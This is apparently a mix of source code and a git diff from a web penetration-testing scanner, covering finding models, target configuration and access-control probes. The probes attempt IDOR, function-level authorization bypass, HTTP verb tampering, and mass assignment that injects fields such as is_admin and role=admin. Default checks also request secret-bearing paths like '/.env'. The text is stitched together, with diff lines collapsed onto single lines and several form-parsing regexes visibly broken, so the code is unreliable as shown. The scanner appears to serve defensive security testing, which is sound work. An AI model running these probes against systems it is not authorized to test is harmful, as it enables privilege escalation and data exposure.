    MITRE ATT&CK IDs, and explicit status outcomes. Separate type from
    blackbox Finding — the two are normalized into a unified flat finding
    dict at the report level by _compute_risk_and_findings().
    """
    scenario_id: str  # e.g. "PT-A01-01"
    title: str
    status: str       # "vulnerable" | "not_vulnerable" | "inconclusive"
    severity: str     # "CRITICAL" | "HIGH" | "MEDIUM" | "LOW" | "INFO"
    owasp: str        # e.g. "A01:2021"
    cwe: list[str] = field(default_factory=list)     # e.g. ["CWE-639", "CWE-862"]
    attack: list[str] = field(default_factory=list)  # MITRE ATT&CK IDs e.g. ["T1078"]
    evidence: list[str] = field(default_factory=list)  # ["endpoint=http://...", "status=200"]
    evidence_artifacts: list[GrayboxEvidenceArtifact | dict] = field(default_factory=list)
    replay_steps: list[str] = field(default_factory=list)  # reproducibility steps
    remediation: str = ""
    error: str | None = None  # non-None if the probe itself errored
    cvss_score: float | None = None
    cvss_vector: str = ""

    @classmethod
    def from_dict(cls, payload: dict[str, Any]) -> "GrayboxFinding":
        """
        Compatibility-safe constructor for persisted finding dicts.

        Unknown keys are dropped; evidence_artifacts entries are coerced
        into GrayboxEvidenceArtifact instances.
        Raises TypeError when payload is not a dict.
        """
        if not isinstance(payload, dict):
            raise TypeError("GrayboxFinding payload must be a dict")
        data = {k: v for k, v in payload.items() if k in cls.__dataclass_fields__}
        data["evidence_artifacts"] = [
            GrayboxEvidenceArtifact.from_value(item)
            for item in data.get("evidence_artifacts", []) or []
        ]
        return cls(**data)

    def to_dict(self) -> dict[str, Any]:
        """JSON-safe serialization (artifacts emitted as plain dicts)."""
        payload = asdict(self)
        payload["evidence_artifacts"] = [
            GrayboxEvidenceArtifact.from_value(item).to_dict()
            for item in self.evidence_artifacts
        ]
        return payload

    def _normalized_evidence_artifacts(self) -> list[GrayboxEvidenceArtifact]:
        """All artifacts coerced to the typed form (tolerates persisted dicts)."""
        return [GrayboxEvidenceArtifact.from_value(item) for item in self.evidence_artifacts]

    def _flat_evidence_summary(self) -> str:
        """One-line evidence string: key=value lines first, artifact summaries as fallback."""
        evidence_lines = [line for line in self.evidence if isinstance(line, str) and line]
        if evidence_lines:
            return "; ".join(evidence_lines)
        artifact_summaries = [
            artifact.summary for artifact in self._normalized_evidence_artifacts()
            if artifact.summary
        ]
        return "; ".join(artifact_summaries)

    def to_flat_finding(self, port: int, protocol: str, probe_name: str) -> dict:
        """
        Normalize to the unified flat finding dict schema used in PassReport.findings.

        Converts structured graybox fields to the common schema that
        _compute_risk_and_findings() produces for all finding types.
        The finding_id is a stable 16-hex digest of (port, probe, sorted
        CWEs, canonical title), so re-running the same probe yields the
        same id regardless of CWE list ordering.
        """
        canon_title = self.title.lower().strip()
        cwe_joined = ", ".join(self.cwe)
        cwe_canonical = ", ".join(sorted({item.strip() for item in self.cwe if isinstance(item, str) and item.strip()}))
        id_input = f"{port}:{probe_name}:{cwe_canonical}:{canon_title}"
        finding_id = hashlib.sha256(id_input.encode()).hexdigest()[:16]

        # Map status -> confidence and effective severity
        confidence_map = {
            "vulnerable": "certain",
            "not_vulnerable": "firm",
            "inconclusive": "tentative",
        }
        # not_vulnerable findings contribute zero to risk score —
        # override severity to INFO so they don't inflate finding_counts
        effective_severity = "INFO" if self.status == "not_vulnerable" else self.severity.upper()

        return {
            "finding_id": finding_id,
            "probe_type": "graybox",
            "severity": effective_severity,
            "title": self.title,
            "description": f"Scenario {self.scenario_id}: {self.title}",
            "owasp_id": self.owasp,
            "cwe_id": cwe_joined,
            "evidence": self._flat_evidence_summary(),
            "evidence_artifacts": [
                artifact.to_dict() for artifact in self._normalized_evidence_artifacts()
            ],
            "remediation": self.remediation,
            "confidence": confidence_map.get(self.status, "tentative"),
            "port": port,
            "protocol": protocol,
            "probe": probe_name,
            "category": "graybox",
            # graybox-only fields
            "scenario_id": self.scenario_id,
            "status": self.status,
            "replay_steps": list(self.replay_steps),
            "attack_ids": list(self.attack),
            "cvss_score": self.cvss_score,
            "cvss_vector": self.cvss_vector,
        }

    @classmethod
    def flat_from_dict(cls, payload: dict[str, Any], port: int, protocol: str, probe_name: str) -> dict[str, Any]:
        """Normalize a persisted graybox finding dict into the flat report contract."""
        return cls.from_dict(payload).to_flat_finding(port, protocol, probe_name)
a/extensions/business/cybersec/red_mesh/graybox/models/__init__.py b/extensions/business/cybersec/red_mesh/graybox/models/__init__.py new file mode 100644 index 00000000..4982d600 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/models/__init__.py @@ -0,0 +1,45 @@ +from .runtime import ( + DiscoveryResult, + GrayboxAuthState, + GrayboxCredential, + GrayboxCredentialSet, + GrayboxProbeDefinition, + GrayboxProbeContext, + GrayboxProbeRunResult, +) +from .target_config import ( + AccessControlConfig, + AdminEndpoint, + BusinessLogicConfig, + COMMON_CSRF_FIELDS, + DiscoveryConfig, + GrayboxTargetConfig, + IdorEndpoint, + InjectionConfig, + MisconfigConfig, + RecordEndpoint, + SsrfEndpoint, + WorkflowEndpoint, +) + +__all__ = [ + "AccessControlConfig", + "AdminEndpoint", + "BusinessLogicConfig", + "COMMON_CSRF_FIELDS", + "DiscoveryConfig", + "DiscoveryResult", + "GrayboxAuthState", + "GrayboxCredential", + "GrayboxCredentialSet", + "GrayboxProbeDefinition", + "GrayboxProbeContext", + "GrayboxProbeRunResult", + "GrayboxTargetConfig", + "IdorEndpoint", + "InjectionConfig", + "MisconfigConfig", + "RecordEndpoint", + "SsrfEndpoint", + "WorkflowEndpoint", +] diff --git a/extensions/business/cybersec/red_mesh/graybox/models/runtime.py b/extensions/business/cybersec/red_mesh/graybox/models/runtime.py new file mode 100644 index 00000000..469ad32a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/models/runtime.py @@ -0,0 +1,122 @@ +from __future__ import annotations + +from dataclasses import dataclass, field + + +@dataclass(frozen=True) +class GrayboxCredential: + username: str = "" + password: str = "" + + @property + def is_configured(self) -> bool: + return bool(self.username) + + def to_dict(self) -> dict: + return { + "username": self.username, + "password": self.password, + } + + +@dataclass(frozen=True) +class GrayboxCredentialSet: + official: GrayboxCredential + regular: GrayboxCredential | None = None + weak_candidates: list[str] = 
field(default_factory=list) + max_weak_attempts: int = 5 + + @classmethod + def from_job_config(cls, job_config) -> GrayboxCredentialSet: + regular = None + if getattr(job_config, "regular_username", ""): + regular = GrayboxCredential( + username=getattr(job_config, "regular_username", "") or "", + password=getattr(job_config, "regular_password", "") or "", + ) + return cls( + official=GrayboxCredential( + username=getattr(job_config, "official_username", "") or "", + password=getattr(job_config, "official_password", "") or "", + ), + regular=regular, + weak_candidates=list(getattr(job_config, "weak_candidates", None) or []), + max_weak_attempts=int(getattr(job_config, "max_weak_attempts", 5) or 5), + ) + + +@dataclass(frozen=True) +class DiscoveryResult: + routes: list[str] = field(default_factory=list) + forms: list[str] = field(default_factory=list) + + def to_tuple(self) -> tuple[list[str], list[str]]: + return self.routes, self.forms + + +@dataclass(frozen=True) +class GrayboxProbeContext: + target_url: str + auth_manager: object + target_config: object + safety: object + discovered_routes: list[str] = field(default_factory=list) + discovered_forms: list[str] = field(default_factory=list) + regular_username: str = "" + allow_stateful: bool = False + + def to_kwargs(self) -> dict: + return { + "target_url": self.target_url, + "auth_manager": self.auth_manager, + "target_config": self.target_config, + "safety": self.safety, + "discovered_routes": list(self.discovered_routes), + "discovered_forms": list(self.discovered_forms), + "regular_username": self.regular_username, + "allow_stateful": self.allow_stateful, + } + + +@dataclass(frozen=True) +class GrayboxAuthState: + created_at: float = 0.0 + refresh_count: int = 0 + official_authenticated: bool = False + regular_authenticated: bool = False + auth_errors: tuple[str, ...] 
= () + + @property + def has_authenticated_session(self) -> bool: + return self.official_authenticated + + +@dataclass(frozen=True) +class GrayboxProbeDefinition: + key: str + cls_path: str + + @classmethod + def from_entry(cls, entry) -> "GrayboxProbeDefinition": + if isinstance(entry, GrayboxProbeDefinition): + return entry + return cls( + key=entry["key"], + cls_path=entry["cls"], + ) + + +@dataclass(frozen=True) +class GrayboxProbeRunResult: + findings: list[object] = field(default_factory=list) + artifacts: list[object] = field(default_factory=list) + outcome: str = "completed" + + @classmethod + def from_value(cls, value, default_outcome: str = "completed") -> "GrayboxProbeRunResult": + if isinstance(value, GrayboxProbeRunResult): + return value + return cls( + findings=list(value or []), + outcome=default_outcome, + ) diff --git a/extensions/business/cybersec/red_mesh/graybox/models/target_config.py b/extensions/business/cybersec/red_mesh/graybox/models/target_config.py new file mode 100644 index 00000000..803716ad --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/models/target_config.py @@ -0,0 +1,229 @@ +""" +Application-specific endpoint mapping for graybox probes. + +Sectioned by probe category (E4). Each probe reads only its section. +Endpoint entries use typed dataclasses — typos in keys raise at +construction time, not at runtime deep inside a probe. + +Passed to the worker via JobConfig.target_config (serialized dict). 
+""" + +from __future__ import annotations + +from dataclasses import dataclass, asdict, field +from typing import Any + + +# Common CSRF field names across frameworks (C5) +COMMON_CSRF_FIELDS = [ + "csrfmiddlewaretoken", # Django + "csrf_token", # Flask / WTForms + "authenticity_token", # Rails + "_csrf", # Spring Security + "_token", # Laravel +] + + +# ── Typed endpoint configs (E4) ────────────────────────────────────────── + +@dataclass(frozen=True) +class IdorEndpoint: + """Endpoint for IDOR/BOLA testing (PT-A01-01).""" + path: str # e.g. "/api/records/{id}/" + test_ids: list[int] = field(default_factory=lambda: [1, 2]) + owner_field: str = "owner" + id_param: str = "id" + + @classmethod + def from_dict(cls, d: dict) -> IdorEndpoint: + return cls( + path=d["path"], + test_ids=d.get("test_ids", [1, 2]), + owner_field=d.get("owner_field", "owner"), + id_param=d.get("id_param", "id"), + ) + + +@dataclass(frozen=True) +class AdminEndpoint: + """Endpoint for privilege escalation testing (PT-A01-02).""" + path: str # e.g. "/api/admin/export-users/" + method: str = "GET" + content_markers: list[str] = field(default_factory=list) + + @classmethod + def from_dict(cls, d: dict) -> AdminEndpoint: + return cls( + path=d["path"], + method=d.get("method", "GET"), + content_markers=d.get("content_markers", []), + ) + + +@dataclass(frozen=True) +class WorkflowEndpoint: + """Endpoint for business logic testing (PT-A06-01).""" + path: str # e.g. "/api/records/{id}/force-pay/" + method: str = "POST" + expected_guard: str = "" + + @classmethod + def from_dict(cls, d: dict) -> WorkflowEndpoint: + return cls( + path=d["path"], + method=d.get("method", "POST"), + expected_guard=d.get("expected_guard", ""), + ) + + +@dataclass(frozen=True) +class SsrfEndpoint: + """Endpoint for SSRF testing (PT-API7-01).""" + path: str # e.g. 
"api/fetch/" + param: str = "url" # query param that accepts a URL + + @classmethod + def from_dict(cls, d: dict) -> SsrfEndpoint: + return cls(path=d["path"], param=d.get("param", "url")) + + +# ── Probe-sectioned config (E4) ───────────────────────────────────────── + +@dataclass(frozen=True) +class AccessControlConfig: + """Config for access control probes (A01).""" + idor_endpoints: list[IdorEndpoint] = field(default_factory=list) + admin_endpoints: list[AdminEndpoint] = field(default_factory=list) + + @classmethod + def from_dict(cls, d: dict) -> AccessControlConfig: + return cls( + idor_endpoints=[IdorEndpoint.from_dict(e) for e in d.get("idor_endpoints", [])], + admin_endpoints=[AdminEndpoint.from_dict(e) for e in d.get("admin_endpoints", [])], + ) + + +@dataclass(frozen=True) +class MisconfigConfig: + """Config for misconfiguration probes (A02).""" + debug_paths: list[str] = field(default_factory=lambda: [ + "/debug/config/", "/.env", "/actuator/env", "/server-info", + "/actuator", "/server-status", + ]) + + @classmethod + def from_dict(cls, d: dict) -> MisconfigConfig: + return cls(debug_paths=d.get("debug_paths", cls.__dataclass_fields__["debug_paths"].default_factory())) + + +@dataclass(frozen=True) +class InjectionConfig: + """Config for injection probes (A03/A05/API7).""" + ssrf_endpoints: list[SsrfEndpoint] = field(default_factory=list) + + @classmethod + def from_dict(cls, d: dict) -> InjectionConfig: + return cls( + ssrf_endpoints=[SsrfEndpoint.from_dict(e) for e in d.get("ssrf_endpoints", [])], + ) + + +@dataclass(frozen=True) +class RecordEndpoint: + """Endpoint for business logic validation testing (PT-A06-02).""" + path: str # e.g. "/records/{id}/" + method: str = "POST" + amount_field: str = "amount" # field name for monetary amount + status_field: str = "status" # field name for status/state + valid_transitions: dict[str, list[str]] = field(default_factory=dict) # e.g. 
{"draft": ["submitted"]} + + @classmethod + def from_dict(cls, d: dict) -> RecordEndpoint: + return cls( + path=d["path"], + method=d.get("method", "POST"), + amount_field=d.get("amount_field", "amount"), + status_field=d.get("status_field", "status"), + valid_transitions=d.get("valid_transitions", {}), + ) + + +@dataclass(frozen=True) +class BusinessLogicConfig: + """Config for business logic probes (A06).""" + workflow_endpoints: list[WorkflowEndpoint] = field(default_factory=list) + record_endpoints: list[RecordEndpoint] = field(default_factory=list) + + @classmethod + def from_dict(cls, d: dict) -> BusinessLogicConfig: + return cls( + workflow_endpoints=[WorkflowEndpoint.from_dict(e) for e in d.get("workflow_endpoints", [])], + record_endpoints=[RecordEndpoint.from_dict(e) for e in d.get("record_endpoints", [])], + ) + + +@dataclass(frozen=True) +class DiscoveryConfig: + """Config for route/form discovery.""" + scope_prefix: str = "" # e.g. "/api/" — only crawl under this path + max_pages: int = 50 # max pages to crawl + max_depth: int = 3 # max link-follow depth + + @classmethod + def from_dict(cls, d: dict) -> DiscoveryConfig: + return cls( + scope_prefix=d.get("scope_prefix", ""), + max_pages=d.get("max_pages", 50), + max_depth=d.get("max_depth", 3), + ) + + +# ── Main config ───────────────────────────────────────────────────────── + +@dataclass(frozen=True) +class GrayboxTargetConfig: + """ + Application-specific endpoint mapping for graybox probes. + + Sectioned by probe category. Each probe reads only its section, + and adding a new probe's config doesn't bloat unrelated sections. + Endpoint entries use typed dataclasses — typos in keys raise at + construction time, not at runtime deep inside a probe. + + Passed to the worker via JobConfig.target_config (serialized dict). 
+ """ + # Per-probe sections (E4) + access_control: AccessControlConfig = field(default_factory=AccessControlConfig) + misconfig: MisconfigConfig = field(default_factory=MisconfigConfig) + injection: InjectionConfig = field(default_factory=InjectionConfig) + business_logic: BusinessLogicConfig = field(default_factory=BusinessLogicConfig) + discovery: DiscoveryConfig = field(default_factory=DiscoveryConfig) + + # Login endpoint configuration (shared across probes) + login_path: str = "/auth/login/" + logout_path: str = "/auth/logout/" + password_reset_path: str = "" # e.g. "/auth/password-reset/request/" + password_reset_confirm_path: str = "" # e.g. "/auth/password-reset/confirm/" + username_field: str = "username" + password_field: str = "password" + csrf_field: str = "" # empty = auto-detect from COMMON_CSRF_FIELDS + + def to_dict(self) -> dict: + return {k: v for k, v in asdict(self).items() if v is not None} + + @classmethod + def from_dict(cls, d: dict) -> GrayboxTargetConfig: + return cls( + access_control=AccessControlConfig.from_dict(d.get("access_control", {})), + misconfig=MisconfigConfig.from_dict(d.get("misconfig", {})), + injection=InjectionConfig.from_dict(d.get("injection", {})), + business_logic=BusinessLogicConfig.from_dict(d.get("business_logic", {})), + discovery=DiscoveryConfig.from_dict(d.get("discovery", {})), + login_path=d.get("login_path", "/auth/login/"), + logout_path=d.get("logout_path", "/auth/logout/"), + password_reset_path=d.get("password_reset_path", ""), + password_reset_confirm_path=d.get("password_reset_confirm_path", ""), + username_field=d.get("username_field", "username"), + password_field=d.get("password_field", "password"), + csrf_field=d.get("csrf_field", ""), + ) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/__init__.py b/extensions/business/cybersec/red_mesh/graybox/probes/__init__.py new file mode 100644 index 00000000..e69de29b diff --git 
"""
Access control probes — A01 IDOR + privilege escalation + verb tampering + mass assignment.
"""

import re

from .base import ProbeBase
from ..findings import GrayboxFinding


class AccessControlProbes(ProbeBase):
    """
    PT-A01-01 IDOR/BOLA, PT-A01-02 function-level authorization bypass,
    PT-A01-03 HTTP verb tampering, PT-A04-01 mass assignment.
    """

    requires_auth = True
    requires_regular_session = True
    is_stateful = False

    def run(self):
        """Run all scenarios that currently have a usable regular session."""
        # regular_session is re-checked before each scenario because a
        # probe could invalidate it mid-run — TODO confirm with AuthManager.
        if self.auth.regular_session:
            self.run_safe("idor", self._test_idor)
        if self.auth.regular_session:
            self.run_safe("privilege_escalation", self._test_privilege_esc)
        if self.auth.regular_session:
            self.run_safe("verb_tampering", self._test_verb_tampering)
        if self.auth.regular_session and self._allow_stateful:
            self.run_safe("mass_assignment", self._test_mass_assignment)
        elif self.auth.regular_session:
            # Stateful probes disabled: record why mass assignment was skipped.
            self.findings.append(GrayboxFinding(
                scenario_id="PT-A04-01",
                title="Mass assignment probe skipped: stateful probes disabled",
                status="inconclusive",
                severity="INFO",
                owasp="A04:2021",
                evidence=["stateful_probes_disabled=True",
                          "reason=mass_assignment_modifies_target_data"],
            ))
        return self.findings

    def _test_idor(self):
        """
        Test IDOR on configured or auto-detected endpoints.

        Emits exactly ONE finding per scenario. Accumulates results across
        all endpoints, then emits vulnerable (worst-case wins) or not_vulnerable.
        """
        endpoints = self.target_config.access_control.idor_endpoints
        if not endpoints:
            endpoints = self._infer_idor_endpoints()
        if not endpoints:
            return

        # Ownership comparison needs to know who we are logged in as.
        if not self.regular_username:
            return

        vulnerable_evidence = None
        endpoints_tested = 0

        for ep in endpoints:
            self.safety.throttle()
            result = self._test_single_idor(ep)
            endpoints_tested += 1
            if result:
                vulnerable_evidence = result
                break

        if vulnerable_evidence:
            owner, url, path = vulnerable_evidence
            self.findings.append(GrayboxFinding(
                scenario_id="PT-A01-01",
                title="Object-level authorization bypass",
                status="vulnerable",
                severity="HIGH",
                owasp="A01:2021",
                cwe=["CWE-639", "CWE-862"],
                attack=["T1078"],
                evidence=[
                    f"endpoint={url}",
                    "response_status=200",
                    f"owner_field={owner}",
                    f"authenticated_user={self.regular_username}",
                ],
                replay_steps=[
                    "Log in as regular user.",
                    f"Request GET {path}.",
                    "Observe owner field not matching logged-in user.",
                ],
                remediation="Authorize object access using both role and ownership checks server-side.",
            ))
        else:
            self.findings.append(GrayboxFinding(
                scenario_id="PT-A01-01",
                title="Object-level authorization — no bypass detected",
                status="not_vulnerable",
                severity="INFO",
                owasp="A01:2021",
                evidence=[f"endpoints_tested={endpoints_tested}"],
            ))

    def _test_single_idor(self, ep):
        """Test one IDOR endpoint. Returns (owner, url, path) on hit, None on miss."""
        path_tpl = ep.path
        for test_id in ep.test_ids:
            path = path_tpl.replace("{id}", str(test_id))
            url = self.target_url + path
            resp = self.auth.regular_session.get(url, timeout=10)
            if resp.status_code != 200:
                continue
            ct = resp.headers.get("content-type", "")
            if not ct.startswith("application/json"):
                continue
            try:
                body = resp.json()
            except ValueError:
                continue
            # A 200 JSON record owned by someone else == object-level bypass.
            owner = body.get(ep.owner_field, "")
            if owner and owner != self.regular_username:
                return (owner, url, path)
        return None

    def _infer_idor_endpoints(self):
        """Auto-detect potential IDOR endpoints from discovered numeric-id routes."""
        from ..models.target_config import IdorEndpoint
        # Matches e.g. "/api/records/7/" or "/records/7" — capture the prefix.
        pattern = re.compile(r"^(/(?:api/)?[\w-]+/)\d+/?$")
        endpoints = []
        for route in self.discovered_routes:
            m = pattern.match(route)
            if m:
                endpoints.append(IdorEndpoint(
                    path=m.group(1) + "{id}/",
                    test_ids=[1, 2],
                    owner_field="owner",
                ))
        return endpoints

    def _test_privilege_esc(self):
        """
        PT-A01-02: probe configured admin endpoints as the regular user.

        FIX (consistency): previously this emitted one finding per hit and
        never emitted a not_vulnerable outcome, contradicting the module's
        one-finding-per-scenario contract (see _test_idor and
        _test_verb_tampering). It now aggregates: the worst single hit wins
        (confirmed content beats inconclusive), otherwise a not_vulnerable
        summary is emitted.
        """
        endpoints = self.target_config.access_control.admin_endpoints
        if not endpoints:
            return

        denial_markers = ["access denied", "permission denied", "forbidden",
                          "not authorized", "unauthorized", "403"]
        best = None  # (status, severity, evidence, replay_steps)
        tested = 0

        for ep in endpoints:
            self.safety.throttle()
            method = ep.method.upper()
            url = self.target_url + ep.path
            if method != "GET":
                continue  # only GET for read-only probes
            resp = self.auth.regular_session.get(url, timeout=10)
            tested += 1
            if resp.status_code != 200:
                continue
            body_lower = resp.text.lower()
            if any(m in body_lower for m in denial_markers):
                continue  # soft denial despite HTTP 200
            # Content markers prove privileged data was actually served.
            has_content = (
                any(m in resp.text for m in ep.content_markers)
                if ep.content_markers else False
            )
            candidate = (
                "vulnerable" if has_content else "inconclusive",
                "HIGH" if has_content else "LOW",
                [
                    f"endpoint={url}",
                    "response_status=200",
                    f"content_verified={has_content}",
                ],
                [
                    "Log in as regular user.",
                    f"Request {method} {ep.path}.",
                    "Confirm privileged data is returned.",
                ],
            )
            if has_content:
                best = candidate
                break  # confirmed bypass — worst case found
            best = best or candidate

        if best:
            status, severity, evidence, replay = best
            self.findings.append(GrayboxFinding(
                scenario_id="PT-A01-02",
                title="Function-level authorization bypass",
                status=status,
                severity=severity,
                owasp="A01:2021",
                cwe=["CWE-862"],
                attack=["T1078"],
                evidence=evidence,
                replay_steps=replay,
                remediation="Require admin role and deny by default for all privileged functions.",
            ))
        elif tested > 0:
            self.findings.append(GrayboxFinding(
                scenario_id="PT-A01-02",
                title="Function-level authorization — no bypass detected",
                status="not_vulnerable",
                severity="INFO",
                owasp="A01:2021",
                evidence=[f"endpoints_tested={tested}"],
            ))

    def _test_verb_tampering(self):
        """
        PT-A01-03: test if access controls can be bypassed by changing HTTP method.

        Takes admin endpoints that should deny regular users and retries with
        alternative HTTP methods (PUT, PATCH, DELETE). Some frameworks only
        enforce authorization on GET/POST but pass through other verbs.
        """
        endpoints = self.target_config.access_control.admin_endpoints
        if not endpoints:
            return

        alternative_methods = ["PUT", "PATCH", "DELETE", "OPTIONS"]
        denial_markers = ["access denied", "permission denied", "forbidden",
                          "not authorized", "unauthorized", "403"]

        tested = 0
        bypass_evidence = []

        for ep in endpoints:
            # First, confirm the endpoint denies regular user via its normal method.
            self.safety.throttle()
            url = self.target_url + ep.path
            try:
                baseline = self.auth.regular_session.request(
                    ep.method.upper(), url, timeout=10,
                )
            except Exception:
                continue

            # Only test verb tampering if the baseline is denied (403/401/302-to-login)
            baseline_denied = baseline.status_code in (401, 403)
            if not baseline_denied and baseline.status_code == 200:
                body_lower = baseline.text.lower()
                baseline_denied = any(m in body_lower for m in denial_markers)
            if not baseline_denied and baseline.status_code in (301, 302):
                location = baseline.headers.get("Location", "").lower()
                baseline_denied = "login" in location
            if not baseline_denied:
                continue  # endpoint already accessible — not a verb tampering target

            # Try alternative methods
            for method in alternative_methods:
                self.safety.throttle()
                try:
                    resp = self.auth.regular_session.request(method, url, timeout=10)
                except Exception:
                    continue
                tested += 1

                # Success status without denial text == the verb slipped through.
                if resp.status_code < 400 and resp.status_code not in (301, 302):
                    body_lower = resp.text.lower()
                    if not any(m in body_lower for m in denial_markers):
                        bypass_evidence.append(
                            f"endpoint={ep.path}; denied_method={ep.method}; "
                            f"accepted_method={method}; status={resp.status_code}"
                        )
                        break  # one bypass per endpoint is enough

        if bypass_evidence:
            self.findings.append(GrayboxFinding(
                scenario_id="PT-A01-03",
                title="HTTP verb tampering bypass",
                status="vulnerable",
                severity="HIGH",
                owasp="A01:2021",
                cwe=["CWE-650"],
                attack=["T1190"],
                evidence=bypass_evidence,
                replay_steps=[
                    "Log in as regular user.",
                    "Send request to admin endpoint using alternative HTTP method.",
                    "Observe access granted despite method-based restriction.",
                ],
                remediation="Enforce authorization checks regardless of HTTP method. "
                            "Deny all methods by default and explicitly allow required ones.",
            ))
        elif tested > 0:
            self.findings.append(GrayboxFinding(
                scenario_id="PT-A01-03",
                title="HTTP verb tampering — no bypass detected",
                status="not_vulnerable",
                severity="INFO",
                owasp="A01:2021",
                evidence=[f"endpoints_tested={len(endpoints)}", f"methods_tested={tested}"],
            ))

    def _test_mass_assignment(self):
        """
        PT-A04-01: test if the server binds unauthorized privilege fields.

        Submits forms as regular user with injected privilege fields
        (is_admin, role, is_staff, etc.) and checks if the server accepts
        and persists them. Stateful — gated behind allow_stateful.
        """
        # Collect testable endpoints: discovered forms + configured record endpoints
        skip_paths = {self.target_config.login_path, self.target_config.logout_path}
        form_paths = [f for f in self.discovered_forms if f not in skip_paths]

        # Also add configured record endpoints (these accept form POSTs)
        for ep in self.target_config.business_logic.record_endpoints:
            path = ep.path
            if "{id}" in path:
                idor_ids = [1, 2]
                for iep in self.target_config.access_control.idor_endpoints:
                    if iep.test_ids:
                        idor_ids = iep.test_ids
                        break
                path = path.replace("{id}", str(idor_ids[0]))
            if path not in skip_paths:
                form_paths.append(path)

        if not form_paths:
            return

        # Privilege escalation fields to inject
        priv_fields = {
            "is_admin": "true",
            "is_staff": "true",
            "is_superuser": "true",
            "role": "admin",
            "admin": "true",
            "user_type": "admin",
            "privilege_level": "10",
            "group": "administrators",
        }

        tested = 0
        accepted_evidence = []

        for form_path in form_paths[:5]:  # cap at 5 forms
            self.safety.throttle()
            url = self.target_url + form_path

            # GET the form to extract existing fields + CSRF token
            try:
                page = self.auth.regular_session.get(url, timeout=10)
            except Exception:
                continue
            if page.status_code != 200:
                continue

            # Extract form fields
            form_fields = {}
for tag in re.finditer(r']*)>', page.text, re.I): + attrs = tag.group(1) + name_m = re.search(r'name=["\']([^"\']+)', attrs) + val_m = re.search(r'value=["\']([^"\']*)', attrs) + if name_m: + form_fields[name_m.group(1)] = val_m.group(1) if val_m else "" + for m in re.finditer( + r']+name=["\']([^"\']+)["\'][^>]*>(.*?)', + page.text, re.I | re.DOTALL, + ): + form_fields[m.group(1)] = m.group(2).strip() + for sel in re.finditer( + r']+name=["\']([^"\']+)["\'][^>]*>(.*?)', + page.text, re.I | re.DOTALL, + ): + sel_name = sel.group(1) + sel_body = sel.group(2) + opt = re.search(r']*selected[^>]*value=["\']([^"\']+)', sel_body, re.I) + if not opt: + opt = re.search(r']*value=["\']([^"\']+)["\'][^>]*selected', sel_body, re.I) + if opt: + form_fields[sel_name] = opt.group(1) + + if not form_fields: + continue + + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + # Build payload: existing fields + injected privilege fields + payload = dict(form_fields) + # Remove CSRF field from form_fields (will add fresh one) + if csrf_field and csrf_field in payload: + del payload[csrf_field] + payload.update(priv_fields) + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + + headers = {"Referer": url} + if csrf_token: + headers["X-CSRFToken"] = csrf_token + + self.safety.throttle() + try: + resp = self.auth.regular_session.post( + url, data=payload, headers=headers, + timeout=10, allow_redirects=False, + ) + except Exception: + continue + tested += 1 + + # Check if server accepted the request + accepted = resp.status_code in (200, 301, 302) + if accepted and resp.status_code == 200: + body_lower = resp.text.lower() + error_markers = ["error", "invalid", "not allowed", "forbidden", + "unknown field", "unexpected"] + if any(m in body_lower for m in error_markers): + accepted = False + + if not accepted: + continue + + # Verify: GET the page again and check if privilege 
fields are reflected + self.safety.throttle() + try: + verify = self.auth.regular_session.get(url, timeout=10) + except Exception: + continue + + persisted_fields = [] + verify_lower = verify.text.lower() + for field_name, field_value in priv_fields.items(): + # Check for field=value in response (JSON or HTML attribute) + if (f'"{field_name}": "{field_value}"' in verify_lower or + f'"{field_name}":"{field_value}"' in verify_lower or + f"value=\"{field_value}\"" in verify.text and field_name in verify.text or + f'name="{field_name}"' in verify.text and f'value="{field_value}"' in verify.text): + persisted_fields.append(field_name) + + if persisted_fields: + accepted_evidence.append( + f"endpoint={form_path}; persisted_fields={','.join(persisted_fields)}" + ) + + if accepted_evidence: + self.findings.append(GrayboxFinding( + scenario_id="PT-A04-01", + title="Mass assignment — privilege field accepted", + status="vulnerable", + severity="HIGH", + owasp="A04:2021", + cwe=["CWE-915"], + attack=["T1078"], + evidence=accepted_evidence, + replay_steps=[ + "Log in as regular user.", + "Submit form with additional privilege fields (is_admin, role, etc.).", + "Observe server persists the injected privilege fields.", + ], + remediation="Use explicit field allowlists in form/API binding. " + "Never bind user input directly to model attributes. " + "Django: use ModelForm.Meta.fields. 
Rails: use strong_parameters.", + )) + elif tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A04-01", + title="Mass assignment — no privilege escalation detected", + status="not_vulnerable", + severity="INFO", + owasp="A04:2021", + evidence=[f"forms_tested={tested}"], + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/base.py b/extensions/business/cybersec/red_mesh/graybox/probes/base.py new file mode 100644 index 00000000..8e0fbd50 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/probes/base.py @@ -0,0 +1,85 @@ +""" +Base class for graybox probe modules. + +Provides shared utilities, error recovery, and capability declarations. +Probes receive fully initialized collaborators — they don't manage +sessions or credentials themselves. +""" + +import requests + +from ..findings import GrayboxFinding +from ..models import GrayboxProbeContext, GrayboxProbeRunResult + + +class ProbeBase: + """ + Shared utilities for graybox probe modules. + + Probes receive fully initialized collaborators — they don't manage + sessions or credentials themselves. + + Capability declarations: subclasses set class-level attributes to + declare their requirements. The worker introspects these after loading + the class from the registry. No capability flags in the registry. + """ + + # Capability declarations — override in subclasses. 
+ requires_auth: bool = True + requires_regular_session: bool = False + is_stateful: bool = False + + def __init__(self, target_url, auth_manager, target_config, safety, + discovered_routes=None, discovered_forms=None, + regular_username="", allow_stateful=False): + self.target_url = target_url.rstrip("/") + self.auth = auth_manager + self.target_config = target_config + self.safety = safety + self.discovered_routes = discovered_routes or [] + self.discovered_forms = discovered_forms or [] + self.regular_username = regular_username + self._allow_stateful = allow_stateful + self.findings: list[GrayboxFinding] = [] + + @classmethod + def from_context(cls, context: GrayboxProbeContext): + """Build a probe from a typed worker-provided context.""" + return cls(**context.to_kwargs()) + + def run_safe(self, probe_name, probe_fn): + """ + Run a probe with error recovery. + + Does NOT call ensure_sessions — the worker is responsible for session + lifecycle. Probes just use self.auth.official_session / + self.auth.regular_session as-is. 
